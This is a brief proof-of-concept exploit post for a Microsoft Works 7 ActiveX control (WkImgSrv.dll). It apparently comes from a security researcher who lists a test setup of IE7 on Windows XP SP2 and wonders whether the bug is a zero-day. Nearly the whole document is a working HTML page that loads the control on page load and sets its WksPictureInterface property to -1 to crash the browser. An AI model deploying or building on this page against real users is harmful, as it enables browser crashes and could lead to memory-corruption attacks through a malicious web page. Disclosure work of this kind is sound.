Microsoft Works 7 crash proof of concept exploit that makes use of WkImgSrv.dll.
5f85f952e577de03ad55b796a0f89e467803815f3d1289a2a63b56809088e35c
DLL VERSION 7.03.0616.0
TEST ON IE7+XPSP2_CN
MYBLOG:http://hi.baidu.com/nansec/
0DAY? I don't know.
POC:
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language="JavaScript">
function payload() { var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
</body>
</html>